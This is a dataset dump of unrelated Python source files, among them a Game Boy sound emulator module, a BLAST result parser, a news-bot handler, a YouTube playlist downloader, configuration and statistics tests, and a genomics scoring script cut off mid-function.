content stringlengths 5 1.05M |
|---|
"""
PyGirl Emulator
Audio Processor Unit (Sharp LR35902 APU)
There are two sound channels connected to the output
terminals SO1 and SO2. There is also a input terminal Vin
connected to the cartridge. It can be routed to either of
both output terminals. GameBoy circuitry allows producing
sound in four different ways:
Quadrangular wave patterns with sweep and envelope functions.
Quadrangular wave patterns with envelope functions.
Voluntary wave patterns from wave RAM.
White noise with an envelope function.
These four sounds can be controlled independantly and
then mixed separately for each of the output terminals.
Sound registers may be set at all times while producing
sound.
When setting the initial value of the envelope and
restarting the length counter, set the initial flag to 1
and initialize the data.
Under the following situations the Sound ON flag is
reset and the sound output stops:
1. When the sound output is stopped by the length counter.
2. When overflow occurs at the addition mode while sweep
is operating at sound 1.
When the Sound OFF flag for sound 3 (bit 7 of NR30) is
set at 0, the cancellation of the OFF mode must be done
by setting the sound OFF flag to 1. By initializing
sound 3, it starts it's function.
When the All Sound OFF flag (bit 7 of NR52) is set to 0,
the mode registers for sounds 1,2,3, and 4 are reset and
the sound output stops. (NOTE: The setting of each sounds
mode register must be done after the All Sound OFF mode
is cancelled. During the All Sound OFF mode, each sound
mode register cannot be set.)
NOTE: DURING THE ALL SOUND OFF MODE, GB POWER CONSUMPTION
DROPS BY 16% OR MORE! WHILE YOUR PROGRAMS AREN'T USING
SOUND THEN SET THE ALL SOUND OFF FLAG TO 0. IT DEFAULTS
TO 1 ON RESET.
These tend to be the two most important equations in
converting between Hertz and GB frequency registers:
(Sounds will have a 2.4% higher frequency on Super GB.)
gb = 2048 - (131072 / Hz)
Hz = 131072 / (2048 - gb)
"""
from pypy.lang.gameboy.constants import *
from pypy.lang.gameboy.ram import iMemory
class Channel(object):
index = 0
length = 0
frequency = 0
def __init__(self, sample_rate, frequency_table):
self.sample_rate = int(sample_rate)
self.frequency_table = frequency_table
self.length = 0
self.envelope = 0
self.frequency = 0
self.playback = 0
self.index = 0
self.length = 0
self.frequency = 0
self.enabled = False
def reset(self):
self.index = 0
self.set_length(0xFF)
self.set_playback(0xBF)
def update_audio(self):
self.update_enabled()
self.update_envelope_and_volume()
self.update_frequency_and_playback()
def update_enabled(self):
pass
def update_envelope_and_volume(self):
pass
def update_frequency_and_playback(self):
pass
def get_length(self):
return self.length
def set_length(self, length):
self.length = length
def get_envelope(self):
return self.envelope
def get_frequency(self):
return self.frequency
def get_playback(self):
return self.playback
def set_playback(self, playback):
self.playback = playback
def mix_audio(self, buffer, length, output_terminal):
pass
# ------------------------------------------------------------------------------
#SquareWaveGenerator
class SquareWaveChannel(Channel):
# Audio Channel 1 int
def __init__(self, sample_rate, frequency_table):
Channel.__init__(self, sample_rate, frequency_table)
self.sample_sweep = 0
self.raw_sample_sweep = 0
self.index = 0
self.length = 0
self.raw_length = 0
self.volume = 0
self.envelope_length = 0
self.sample_sweep_length = 0
self.frequency = 0
self.raw_frequency = 0
def reset(self):
Channel.reset(self)
self.set_sweep(0x80)
self.set_length(0x3F)
self.set_envelope(0x00)
self.set_frequency(0xFF)
# Audio Channel 1
def get_sweep(self):
return self.raw_sample_sweep
def set_sweep(self, data):
self.raw_sample_sweep = data
self.sample_sweep_length = (SOUND_CLOCK / 128) * \
((self.sample_sweep >> 4) & 0x07)
def get_length(self):
return self.raw_length
def set_length(self, data):
self.raw_length = data
self.length = (SOUND_CLOCK / 256) * (64 - (self.raw_length & 0x3F))
def set_envelope(self, data):
self.envelope = data
if (self.playback & 0x40) != 0:
return
if (self.envelope >> 4) == 0:
self.volume = 0
elif self.envelope_length == 0 and (self.envelope & 0x07) == 0:
self.volume = (self.volume + 1) & 0x0F
else:
self.volume = (self.volume + 2) & 0x0F
def set_frequency(self, data):
self.raw_frequency = data
index = self.raw_frequency + ((self.playback & 0x07) << 8)
self.frequency = self.frequency_table[index]
def set_playback(self, data):
self.playback = data
index = self.raw_frequency + ((self.playback & 0x07) << 8)
self.frequency = self.frequency_table[index]
if (self.playback & 0x80) != 0:
self.enabled = True
if (self.playback & 0x40) != 0 and self.length == 0:
self.length = (SOUND_CLOCK / 256) * \
(64 - (self.length & 0x3F))
self.sample_sweep_length = (SOUND_CLOCK / 128) * \
((self.raw_sample_sweep >> 4) & 0x07)
self.volume = self.envelope >> 4
self.envelope_length = (SOUND_CLOCK / 64) * (self.envelope & 0x07)
def update_enable(self):
if (self.playback & 0x40) != 0 and self.length > 0:
self.length-=1
if self.length <= 0:
self.enabled = False
def update_volume_and_envelope(self):
if self.envelope_length <= 0: return
self.envelope_length -= 1
if self.envelope_length <= 0:
if (self.envelope & 0x08) != 0:
if (self.volume < 15):
self.volume += 1
elif self.volume > 0:
self.volume -= 1
self.envelope_length += (SOUND_CLOCK / 64) * (self.envelope & 0x07)
def update_frequency_and_playback(self):
if self.sample_sweep_length <= 0:
return
self.sample_sweep_length-=1
if self.sample_sweep_length > 0:
return
sweep_steps = (self.raw_sample_sweep & 0x07)
if sweep_steps != 0:
self.update_frequency(sweep_steps)
self.sample_sweep_length += (SOUND_CLOCK / 128) * \
((self.raw_sample_sweep >> 4) & 0x07)
def update_frequency(self, sweep_steps):
frequency = ((self.playback & 0x07) << 8) + self.frequency
if (self.raw_sample_sweep & 0x08) != 0:
frequency -= frequency >> sweep_steps
else:
frequency += frequency >> sweep_steps
if frequency < 2048:
self.frequency = self.frequency_table[frequency]
self.raw_frequency = frequency & 0xFF
self.playback = (self.playback & 0xF8) + \
((frequency >> 8) & 0x07)
else:
self.frequency = 0
self.enabled = False
#self.output_enable &= ~0x01
def mix_audio(self, buffer, length, output_terminal):
wave_pattern = self.get_current_wave_pattern()
for index in range(0, length, 3):
self.index += self.frequency
# if (self.index & (0x1F << 22)) >= wave_pattern:
# output_terminal & 0x20 for the second SquareWaveChannel
if (output_terminal & 0x10) != 0:
buffer[index + 0] -= self.volume
if (output_terminal & 0x01) != 0:
buffer[index + 1] -= self.volume
#else:
# if (output_terminal & 0x10) != 0:
# buffer[index + 0] += self.volume
# if (output_terminal & 0x01) != 0:
# buffer[index + 1] += self.volume
def get_current_wave_pattern(self):
wave_pattern = 0x18
if (self.raw_length & 0xC0) == 0x00:
wave_pattern = 0x04
elif (self.raw_length & 0xC0) == 0x40:
wave_pattern = 0x08
elif (self.raw_length & 0xC0) == 0x80:
wave_pattern = 0x10
return wave_pattern << 22
# ---------------------------------------------------------------------------
class VoluntaryWaveChannel(Channel):
def __init__(self, sample_rate, frequency_table):
Channel.__init__(self, sample_rate, frequency_table)
self.enable = 0
self.level = 0
self.index = 0
self.length = 0
self.raw_length = 0
self.frequency = 0
self.raw_frequency = 0
self.wave_pattern = [0]*16
def reset(self):
Channel.reset(self)
self.set_enable(0x7F)
self.set_length(0xFF)
self.set_level(0x9F)
self.set_frequency(0xFF)
self.set_playback(0xBF)
def get_enable(self):
return self.enable
def set_enable(self, data):
self.enable = data & 0x80
if (self.enable & 0x80) == 0:
self.enabled = False
def get_level(self):
return self.level
def set_level(self, data):
self.level = data
def get_length(self):
return self.raw_length
def set_length(self, data):
self.raw_length = data
self.length = (SOUND_CLOCK / 256) * (256 - self.raw_length)
def get_frequency(self):
return self.raw_frequency
def set_frequency(self, data):
self.raw_frequency = data
index = ((self.playback & 0x07) << 8) + self.raw_frequency
self.frequency = self.frequency_table[index] >> 1
def set_playback(self, data):
self.playback = data
index = ((self.playback & 0x07) << 8) + self.raw_frequency
self.frequency = self.frequency_table[index] >> 1
if (self.playback & 0x80) != 0 and (self.enable & 0x80) != 0:
self.enabled = True
if (self.playback & 0x40) != 0 and self.length == 0:
self.length = (SOUND_CLOCK / 256) * (256 - self.raw_length)
def set_wave_pattern(self, address, data):
self.wave_pattern[address & 0x0F] = data
def get_wave_pattern(self, address):
return self.wave_pattern[address & 0x0F] & 0xFF
def update_audio(self):
if (self.playback & 0x40) != 0 and self.length > 0:
self.length-=1
self.enabled = self.length <= 0
#self.output_enable &= ~0x04
def mix_audio(self, buffer, length, output_terminal):
wave_pattern = self.get_current_wave_pattern()
for index in range(0, length, 2):
self.index += self.frequency
sample = self.wave_pattern[(self.index >> 23) & 0x0F]
if ((self.index & (1 << 22)) != 0):
sample = (sample >> 0) & 0x0F
else:
sample = (sample >> 4) & 0x0F
sample = int(((sample - 8) << 1) >> self.level)
if (output_terminal & 0x40) != 0:
buffer[index + 0] += sample
if (output_terminal & 0x04) != 0:
buffer[index + 1] += sample
def get_current_wave_pattern(self):
wave_pattern = 2
if (self.level & 0x60) == 0x00:
wave_pattern = 8
elif (self.level & 0x60) == 0x20:
wave_pattern = 0
elif (self.level & 0x60) == 0x40:
wave_pattern = 1
return wave_pattern << 22
# ---------------------------------------------------------------------------
class NoiseGenerator(Channel):
def __init__(self, sample_rate, frequency_table):
Channel.__init__(self, sample_rate, frequency_table)
# Audio Channel 4 int
self.length = 0
self.polynomial = 0
self.index = 0
self.length = 0
self.raw_length = 0
self.volume = 0
self.envelope_length = 0
self.frequency = 0
self.generate_noise_frequency_ratio_table()
self.generate_noise_tables()
def reset(self):
Channel.reset(self)
self.set_length(0xFF)
self.set_envelope(0x00)
self.set_polynomial(0x00)
self.set_playback(0xBF)
def generate_noise_frequency_ratio_table(self):
# Polynomial Noise Frequency Ratios
# 4194304 Hz * 1 / 2^3 * 2 4194304 Hz * 1 / 2^3 * 1 4194304 Hz * 1 / 2^3 *
# 1 / 2 4194304 Hz * 1 / 2^3 * 1 / 3 4194304 Hz * 1 / 2^3 * 1 / 4 4194304 Hz *
# 1 / 2^3 * 1 / 5 4194304 Hz * 1 / 2^3 * 1 / 6 4194304 Hz * 1 / 2^3 * 1 / 7
self.noiseFreqRatioTable = [0] * 8
sampleFactor = ((1 << 16) / self.sample_rate)
self.noiseFreqRatioTable[0] = GAMEBOY_CLOCK * sampleFactor
for ratio in range(1, 8):
divider = 2 * ratio
self.noiseFreqRatioTable[ratio] = (GAMEBOY_CLOCK / divider) * \
sampleFactor
def generate_noise_tables(self):
self.create_7_step_noise_table()
self.create_15_step_noise_table()
def create_7_step_noise_table(self):
# Noise Tables
self. noise_step_7_table = [0]*4
polynomial = 0x7F
# 7 steps
for index in range(0, 0x7F):
polynomial = (((polynomial << 6) ^ (polynomial << 5)) & 0x40) | \
(polynomial >> 1)
if (index & 0x1F) == 0:
self.noise_step_7_table[index >> 5] = 0
self.noise_step_7_table[index >> 5] |= (polynomial & 0x01) << \
(index & 0x1F)
def create_15_step_noise_table(self):
# 15 steps&
self.noise_step_15_table = [0]*1024
polynomial = 0x7FFF
for index in range(0, 0x7FFF):
polynomial = (((polynomial << 14) ^ (polynomial << 13)) & \
0x4000) | (polynomial >> 1)
if (index & 0x1F) == 0:
self.noise_step_15_table[index >> 5] = 0
self.noise_step_15_table[index >> 5] |= (polynomial & 0x01) << \
(index & 0x1F)
def get_length(self):
return self.raw_length
def set_length(self, data):
self.raw_length = data
self.length = (SOUND_CLOCK / 256) * (64 - (self.length & 0x3F))
def set_envelope(self, data):
self.envelope = data
if (self.playback & 0x40) is not 0:
return
if (self.envelope >> 4) == 0:
self.volume = 0
elif self.envelope_length == 0 and (self.envelope & 0x07) == 0:
self.volume = (self.volume + 1) & 0x0F
else:
self.volume = (self.volume + 2) & 0x0F
def get_polynomial(self):
return self.polynomial
def set_polynomial(self, data):
self.polynomial = data
if (self.polynomial >> 4) <= 12:
freq = self.noiseFreqRatioTable[self.polynomial & 0x07]
self.frequency = freq >> ((self.polynomial >> 4) + 1)
else:
self.frequency = 0
def get_playback(self):
return self.playback
def set_playback(self, data):
self.playback = data
if (self.playback & 0x80) == 0:
return
self.enabled = True
if (self.playback & 0x40) != 0 and self.length == 0:
self.length = (SOUND_CLOCK / 256) * (64 - (self.length & 0x3F))
self.volume = self.envelope >> 4
self.envelope_length = (SOUND_CLOCK / 64) * (self.envelope & 0x07)
self.index = 0
def update_enabled(self):
if (self.playback & 0x40) != 0 and self.length > 0:
self.length-=1
self.enabled = self.length <= 0
#self.output_enable &= ~0x08
def update_envelope_and_volume(self):
if self.envelope_length <= 0:
return
self.envelope_length -= 1
if self.envelope_length > 0:
return
if (self.envelope & 0x08) != 0:
if self.volume < 15:
self.volume += 1
elif self.volume > 0:
self.volume -= 1
self.envelope_length += (SOUND_CLOCK / 64) * (self.envelope & 0x07)
def mix_audio(self, buffer, length, output_terminal):
for index in range(0, length, 2):
self.index += self.frequency
#polynomial
if (self.polynomial & 0x08) != 0:
# 7 steps
self.index &= 0x7FFFFF
polynomial = self.noise_step_7_table[self.index >> 21] >>\
((self.index >> 16) & 0x1F)
else:
# 15 steps
self.index &= 0x7FFFFFFF
polynomial = self.noise_step_15_table[self.index >> 21] >> \
((self.index >> 16) & 0x1F)
if (polynomial & 1) != 0:
if (output_terminal & 0x80) != 0:
buffer[index + 0] -= self.volume
if (output_terminal & 0x08) != 0:
buffer[index + 1] -= self.volume
else:
if (output_terminal & 0x80) != 0:
buffer[index + 0] += self.volume
if (output_terminal & 0x08) != 0:
buffer[index + 1] += self.volume
# ------------------------------------------------------------------------------
class Sound(iMemory):
def __init__(self, sound_driver):
self.buffer = [0] * 512
self.outputLevel = 0
self.output_terminal = 0
self.output_enable = 0
self.driver = sound_driver
self.sample_rate = self.driver.get_sample_rate()
self.generate_frequency_table()
self.create_channels()
self.reset()
def create_channels(self):
self.channel1 = SquareWaveChannel(self.sample_rate, self.frequency_table)
self.channel2 = SquareWaveChannel(self.sample_rate, self.frequency_table)
self.channel3 = VoluntaryWaveChannel(self.sample_rate, self.frequency_table)
self.channel4 = NoiseGenerator(self.sample_rate, self.frequency_table)
self.channels = [self.channel1, self.channel2, self.channel3, self.channel4]
def generate_frequency_table(self):
self.frequency_table = [0] * 2048
# frequency = (4194304 / 32) / (2048 - period) Hz
for period in range(0, 2048):
skip = (((GAMEBOY_CLOCK << 10) / \
self.sample_rate) << 16) / (2048 - period)
if skip >= (32 << 22):
self.frequency_table[period] = 0
else:
self.frequency_table[period] = skip
def reset(self):
self.cycles = int(GAMEBOY_CLOCK / SOUND_CLOCK)
self.frames = 0
self.channel1.reset()
self.channel2.reset()
self.channel3.reset()
self.channel4.reset()
self.set_output_level(0x00)
self.set_output_terminal(0xF0)
self.set_output_enable(0xFF)
for address in range(0xFF30, 0xFF3F):
write = 0xFF
if (address & 1) == 0:
write = 0x00
self.write(address, write)
def start(self):
self.driver.start()
def stop(self):
self.driver.stop()
def get_cycles(self):
return self.cycles
def emulate(self, ticks):
ticks = int(ticks)
self.cycles -= ticks
while (self.cycles <= 0):
self.update_audio()
if self.driver.is_enabled():
self.mix_down_audio()
self.cycles += GAMEBOY_CLOCK / SOUND_CLOCK
def mix_down_audio(self):
self.frames += self.driver.get_sample_rate()
length = (self.frames / SOUND_CLOCK) << 1
self.mix_audio(self.buffer, length)
self.driver.write(self.buffer, length)
self.frames %= SOUND_CLOCK
def read(self, address):
# TODO map the read/write in groups directly to the channels
address = int(address)
if address==NR10:
return self.channel1.get_sweep()
elif address == NR11:
return self.channel1.get_length()
elif address == NR12:
return self.channel1.get_envelope()
elif address == NR13:
return self.channel1.get_frequency()
elif address == NR14:
return self.channel1.get_playback()
elif address == NR21:
return self.channel2.get_length()
elif address == NR22:
return self.channel2.get_envelope()
elif address==NR23:
return self.channel2.get_frequency()
elif address==NR24:
return self.channel2.get_playback()
elif address==NR30:
return self.channel3.get_enable()
elif address==NR31:
return self.channel3.get_length()
elif address==NR32:
return self.channel3.get_level()
elif address==NR33:
return self.channel4.get_frequency()
elif address==NR34:
return self.channel3.get_playback()
elif address==NR41:
return self.channel4.get_length()
elif address==NR42:
return self.channel4.get_envelope()
elif address==NR43:
return self.channel4.get_polynomial()
elif address==NR44:
return self.channel4.get_playback()
elif address==NR50:
return self.get_output_level()
elif address==NR51:
return self.get_output_terminal()
elif address==NR52:
return self.get_output_enable()
elif address >= AUD3WAVERAM and address <= AUD3WAVERAM + 0x3F:
return self.channel3.get_wave_pattern(address)
return 0xFF
def write(self, address, data):
address = int(address)
if address == NR10:
self.channel1.set_sweep(data)
elif address == NR11:
self.channel1.set_length(data)
elif address == NR12:
self.channel1.set_envelope(data)
elif address == NR13:
self.channel1.set_frequency(data)
elif address == NR14:
self.channel1.set_playback(data)
elif address == NR21:
self.channel2.set_length(data)
elif address == NR22:
self.channel2.set_envelope(data)
elif address == NR23:
self.channel2.set_frequency(data)
elif address == NR24:
self.channel2.set_playback(data)
elif address == NR30:
self.channel3.set_enable(data)
elif address == NR31:
self.channel3.set_length(data)
elif address == NR32:
self.channel3.set_level(data)
elif address == NR33:
self.channel3.set_frequency(data)
elif address == NR34:
self.channel3.set_playback(data)
elif address == NR41:
self.channel4.set_length(data)
elif address == NR42:
self.channel4.set_envelope(data)
elif address == NR43:
self.channel4.set_polynomial(data)
elif address == NR44:
self.channel4.set_playback(data)
elif address == NR50:
self.set_output_level(data)
elif address == NR51:
self.set_output_terminal(data)
elif address == NR52:
self.set_output_enable(data)
elif address >= AUD3WAVERAM and address <= AUD3WAVERAM + 0x3F:
self.channel3.set_wave_pattern(address, data)
def update_audio(self):
if (self.output_enable & 0x80) != 0:
for channel in self.channels:
if channel.enabled:
channel.update_audio()
def mix_audio(self, buffer, length):
if (self.output_enable & 0x80) != 0:
for channel in self.channels:
if channel.enabled:
channel.mix_audio(buffer, length, self.output_terminal)
# Output Control
def get_output_level(self):
return self.outputLevel
def get_output_terminal(self):
return self.output_terminal
def get_output_enable(self):
return self.output_enable
def set_output_level(self, data):
self.outputLevel = data
def set_output_terminal(self, data):
self.output_terminal = data
def set_output_enable(self, data):
# TODO map directly to the channels
self.output_enable = (self.output_enable & 0x7F) | (data & 0x80)
if (self.output_enable & 0x80) == 0x00:
self.output_enable &= 0xF0
class BogusSound(iMemory):
"""
Used for development purposes
"""
def __init__(self):
pass
def get_cycles(self):
return
def reset(self):
pass
def get_cycles(self):
return 0xFF
def emulate(self, ticks):
pass
# SOUND DRIVER -----------------------------------------------------------------
class SoundDriver(object):
def __init__(self):
self.enabled = True
self.sample_rate = 44100
self.channel_count = 2
self.bits_per_sample = 8
def is_enabled(self):
return self.enabled
def get_sample_rate(self):
return self.sample_rate
def get_channels(self):
return self.channel_count
def get_bits_per_sample(self):
return self.bits_per_sample
def start(self):
pass
def stop(self):
pass
def write(self, buffer, length):
pass
|
from Bio.Blast.Applications import NcbiblastpCommandline, NcbiblastnCommandline, NcbimakeblastdbCommandline
class Blast:
'''
class for each column of line from blast = 8 or blast+ = 6
'''
def __init__(self, line, q, db):
blastSplit = line.split("\t")
self.parsed = blastSplit
self.query = blastSplit[0]
self.subject = blastSplit[1]
self.percent = float(blastSplit[2])
self.alignment_length = int(blastSplit[3])
self.mismatches = int(blastSplit[4])
self.gap_openings = int(blastSplit[5])
self.query_start = int(blastSplit[6])
self.query_end = int(blastSplit[7])
self.subject_start = int(blastSplit[8])
self.subject_end = int(blastSplit[9])
self.eval = float(blastSplit[10])
self.bit_score = float(blastSplit[11])
self.query_file_path = q
self.db_file_path = db
def __str__(self):
return f"<JAKomics BLAST Class>"
def view(self):
return [self.query, self.subject, self.percent, self.eval]
def print_rough_result(self):
print(self.query, self.subject, self.percent, self.eval, sep="\t")
def print_full_result(self):
print(f'{self.query} ({self.query_start}-{self.query_end}) hits {self.subject} ({self.subject_start}-{self.subject_end}) at {self.percent}% and {self.mismatches}/{self.gap_openings} mismatches/gaps (e-value: {self.eval}, score: {self.bit_score}).')
# print(self.query, self.subject, self.percent, self.alignment_length, self.mismatches,
# self.gap_openings, self.query_start + "-" + self.query_stop, sep="\t")
def filter(self, e=10, b=1, p=35):
passed = False
if self.eval <= float(e):
if self.bit_score >= float(b):
if self.percent >= float(p):
passed = True
return passed
def result(self):
return {'gene': self.query,
'annotation': self.subject,
'score': self.bit_score,
'evalue': self.eval}
def test():
print("blast module loaded correctly")
def make_blast_db(type, db):
make_blast_db_cl = NcbimakeblastdbCommandline(
dbtype=type,
input_file=db)
make_blast_db_cl()
def run_blast(type, q, db, threads=1, e=0.001, make=False, return_query_results=True, echo=False):
'''
type = "prot" or "nucl"
'''
if make:
make_blast_db(type, db)
if type == 'prot':
blast_type = NcbiblastpCommandline
elif type == "nucl":
blast_type = NcbiblastnCommandline
blast_cline = blast_type(
query=q,
db=db,
evalue=e,
outfmt=6,
num_threads=threads)
if echo:
print(blast_cline)
stdout, stderr = blast_cline()
raw_results = stdout.split("\n")
if echo:
print(stderr)
results = {}
if return_query_results:
for line in [line.strip() for line in raw_results]:
if len(line) > 0:
hit = Blast(line, q, db)
if hit.query in results:
results[hit.query].append(hit)
else:
results[hit.query] = [hit]
else:
for line in [line.strip() for line in raw_results]:
if len(line) > 0:
hit = Blast(line, q, db)
if hit.subject in results:
results[hit.subject].append(hit)
else:
results[hit.subject] = [hit]
return results
|
# Powered by https://newsapi.org
# Import essentials
import requests
import json
import os
from pymessenger.bot import Bot
from pymessenger import Element
# Definitons
class getNewsHeadlines:
# Get news headlines from various news sources
def __init__(self):
self.inp = 'news_sources'
self.out = 'news'
def do(self, entities):
r = requests.get('https://newsapi.org/v1/articles', params={
'source': entities['news_sources'], 'apiKey': os.environ['NEWSAPI_KEY']})
data = json.loads(r.text)
val = []
for x in data['articles'][:5]:
elem = Element(title=x['title'], subtitle=x['description'],
image_url=x['urlToImage'], item_url=x['url'])
val.append(elem)
entities['news'] = ('Here\'s the news', val)
return entities
|
import json
from mcoding_youtube.app_config import config
from mcoding_youtube.youtube import paginated_results, get_authenticated_readonly_service
def dump_json_to_file(obj, filename):
with open(filename, 'w', encoding='utf-8') as f:
json.dump(obj, f)
def get_my_uploads_playlist_id(youtube):
# see https://developers.google.com/youtube/v3/docs/channels/list
channels_response = youtube.channels().list(
mine=True,
part='contentDetails'
).execute()
for channel in channels_response['items']:
return channel['contentDetails']['relatedPlaylists']['uploads']
return None
def download_playlist_video_snippets(youtube, playlist_id, file_prefix):
# see https://developers.google.com/youtube/v3/docs/playlistItems/list
playlistitems_list_request = youtube.playlistItems().list(
playlistId=playlist_id,
part='snippet',
maxResults=50
)
results = paginated_results(youtube.playlistItems(), playlistitems_list_request)
for page_no, playlistitems_list_response in enumerate(results):
dump_json_to_file(playlistitems_list_response, f'{file_prefix}{page_no}.json')
def main():
client_secret_file = config.client_secret_file
youtube = get_authenticated_readonly_service(client_secret_file)
uploads_playlist_id = get_my_uploads_playlist_id(youtube)
file_prefix = 'data/my_videos_page_'
if uploads_playlist_id is not None:
download_playlist_video_snippets(youtube, uploads_playlist_id, file_prefix)
else:
print('There is no uploaded videos playlist for this user.')
if __name__ == '__main__':
main()
|
import numpy as np
a = np.array([[1,-3,-2],[0,2,4],[0,0,-10]])
print("A :",a)
b = np.array([7,4,12])
c = np.linalg.solve(a,b)
print("C :",c)
|
class DataNotFound(RuntimeError):
pass
class DataError(RuntimeError):
pass
class InvalidAge(RuntimeError):
pass
class InvalidMeasurement(RuntimeError):
pass |
import os
import sys
import dynaconf
def test_djdt_382(tmpdir):
settings_file = tmpdir.join("settings.py")
settings_file.write("\n".join(["SECRET_KEY = 'dasfadfds2'"]))
tmpdir.join("__init__.py").write("")
os.environ["DJANGO_SETTINGS_MODULE"] = "settings"
sys.path.append(str(tmpdir))
__import__("settings")
settings = dynaconf.DjangoDynaconf("settings", environments=True)
settings.configure(settings_module="settings")
assert settings.SECRET_KEY == "dasfadfds2"
assert settings.is_overridden("FOO") is False
def test_override_settings_596(tmpdir):
settings_file = tmpdir.join("other_settings.py")
settings_file.write("\n".join(["SECRET_KEY = 'abcdef'"]))
tmpdir.join("__init__.py").write("")
os.environ["DJANGO_SETTINGS_MODULE"] = "other_settings"
sys.path.append(str(tmpdir))
__import__("other_settings")
settings = dynaconf.DjangoDynaconf("other_settings", environments=True)
settings.configure(settings_module="other_settings")
assert settings.SECRET_KEY == "abcdef"
# mimic what django.test.utils.override_settings does
class UserSettingsHolder(dynaconf.LazySettings):
_django_override = True
override = UserSettingsHolder(settings._wrapped)
override.SECRET_KEY = "foobar"
# overriden settings is changed
assert override.SECRET_KEY == "foobar"
# original not changed
assert settings.SECRET_KEY == "abcdef"
|
"""
Solve a problem with SLOPE and compare to R
"""
from __future__ import print_function
import numpy as np
import nose.tools as nt
try:
import rpy2.robjects as rpy
rpy2_available = True
import rpy2.robjects.numpy2ri
from rpy2.robjects.packages import importr
from rpy2 import robjects
except ImportError:
rpy2_available = False
Rslope = True
try:
SLOPE = importr('SLOPE')
except:
Rslope = False
import regreg.api as rr
from regreg.atoms.slope import slope
from regreg.tests.decorators import set_seed_for_test
def fit_slope_R(X, Y):
rpy2.robjects.numpy2ri.activate()
robjects.r('''
slope = function(X, Y, W=NA, choice_weights, tol_infeas = 1e-6,
tol_rel_gap = 1e-6){
result = SLOPE(X, Y, q = 0.1, lambda='bh', scale='l2',
intercept=FALSE,
tol_infeas = tol_infeas, tol_rel_gap = tol_rel_gap)
print(result$alpha)
return(list(beta = result$coefficients, E = result$selected, lambda_seq = result$lambda, sigma = result$sigma,
alpha=result$alpha))
}''')
r_slope = robjects.globalenv['slope']
n, p = X.shape
r_X = robjects.r.matrix(X, nrow=n, ncol=p)
r_Y = robjects.r.matrix(Y, nrow=n, ncol=1)
result = r_slope(r_X, r_Y)
rpy2.robjects.numpy2ri.deactivate()
return result[0], result[1], result[2], result[3], result[4]
@set_seed_for_test(10)
@np.testing.dec.skipif(True, msg="SLOPE parameterization in R has changed")
def test_using_SLOPE_weights():
n, p = 500, 50
X = np.random.standard_normal((n, p))
#Y = np.random.standard_normal(n)
X -= X.mean(0)[None, :]
X /= (X.std(0)[None, :] * np.sqrt(n))
beta = np.zeros(p)
beta[:5] = 5.
Y = X.dot(beta) + np.random.standard_normal(n)
output_R = fit_slope_R(X, Y)
r_beta = np.squeeze(output_R[0])[:,3]
r_lambda_seq = np.array(output_R[2]).reshape(-1)
alpha = output_R[-1]
W = np.asarray(r_lambda_seq * alpha[3]).reshape(-1)
pen = slope(W, lagrange=1.)
loss = rr.squared_error(X, Y)
problem = rr.simple_problem(loss, pen)
soln = problem.solve(tol=1.e-14, min_its=500)
# we get a better objective value
nt.assert_true(problem.objective(soln) < problem.objective(np.asarray(r_beta)))
nt.assert_true(np.linalg.norm(soln - r_beta) < 1.e-6 * np.linalg.norm(soln))
@set_seed_for_test(10)
@np.testing.dec.skipif(True, msg="SLOPE parameterization in R has changed")
def test_using_SLOPE_prox():
n, p = 50, 50
X = np.identity(n)
beta = np.zeros(p)
beta[:5] = 5.
Y = X.dot(beta) + np.random.standard_normal(n)
output_R = fit_slope_R(X, Y)
r_beta = np.squeeze(output_R[0])[:,3]
r_lambda_seq = np.array(output_R[2]).reshape(-1)
alpha = output_R[-1]
W = np.asarray(r_lambda_seq * alpha[3]).reshape(-1)
pen = slope(W, lagrange=1.)
soln = pen.lagrange_prox(Y)
# test that the prox maps agree
nt.assert_true(np.linalg.norm(soln - r_beta) < 1.e-10 * np.linalg.norm(soln))
|
import math
from annogesiclib.gff3 import Gff3Parser
from annogesiclib.lib_reader import read_libs, read_wig
def read_gff(input_file):
datas = []
gff_parser = Gff3Parser()
f_h = open(input_file, "r")
for entry in gff_parser.entries(f_h):
entry.attributes["print"] = False
datas.append(entry)
datas = sorted(datas, key=lambda k: (k.seq_id, k.start, k.end, k.strand))
return datas
def get_coverage(tar, wigs):
'''get coverage'''
coverage = 0
for strain, conds in wigs.items():
if tar.seq_id == strain:
for tracks in conds.values():
for wigs in tracks.values():
if coverage < wigs[tar.start - 1]["coverage"]:
coverage = wigs[tar.start - 1]["coverage"]
return coverage
def compare_wig(tars, wig_fs, wig_rs):
'''get the coverage of TSS for comparison'''
for tar in tars:
if tar.strand == "+":
tar.attributes["coverage"] = get_coverage(tar, wig_fs)
elif tar.strand == "-":
tar.attributes["coverage"] = get_coverage(tar, wig_rs)
def stat(tars, refs, cutoff, gene_length, cluster):
'''do statistics and print it out'''
stats = {"tp": 0, "fp": 0, "miss": 0, "fp_rate": 0,
"tp_rate": 0, "miss_rate": 0}
num_ref = 0
for ref in refs:
num_ref += 1
detect = False
for tar in tars:
if (ref.seq_id == tar.seq_id) and (
ref.strand == tar.strand) and (
float(tar.attributes["coverage"]) >= cutoff) and (
tar.start <= int(gene_length)):
if math.fabs(ref.start - tar.start) <= cluster:
stats["tp"] += 1
tar.attributes["print"] = True
detect = True
if not detect:
stats["miss"] += 1
for tar in tars:
if (not tar.attributes["print"]) and (
float(tar.attributes["coverage"]) >= cutoff) and (
tar.start <= int(gene_length)):
stats["fp"] += 1
stats["fp_rate"] = float(stats["fp"]) / float(int(gene_length) - num_ref)
stats["tp_rate"] = float(stats["tp"]) / float(num_ref)
stats["miss_rate"] = float(stats["miss"]) / float(num_ref)
return stats, num_ref
def print_file(tars, cutoff, out_file):
out = open(out_file, "w")
for tar in tars:
if tar.attributes["coverage"] >= cutoff:
out.write(tar.info + "\n")
def change_best(num_ref, best, stat_value):
'''scoring function for evaluate the change of TSS candidates'''
change = False
if num_ref > 100:
if best["tp_rate"] - stat_value["tp_rate"] >= 0.1:
change = False
else:
if (best["tp_rate"] <= stat_value["tp_rate"]) and (
best["fp_rate"] >= stat_value["fp_rate"]):
best = stat_value.copy()
change = True
elif (stat_value["tp_rate"] - best["tp_rate"] >= 0.01) and (
stat_value["fp_rate"] - best["fp_rate"] <= 0.00005):
best = stat_value.copy()
change = True
elif (best["tp_rate"] - stat_value["tp_rate"] <= 0.01) and (
best["fp_rate"] - stat_value["fp_rate"] >= 0.00005):
best = stat_value.copy()
change = True
else:
if best["tp"] - stat_value["tp"] >= 5:
change = False
else:
if (best["tp"] <= stat_value["tp"]) and (
best["fp"] >= stat_value["fp"]):
best = stat_value.copy()
change = True
tp_diff = float(best["tp"] - stat_value["tp"])
if tp_diff > 0:
if float(best["fp"] - stat_value["fp"]) >= 5 * tp_diff:
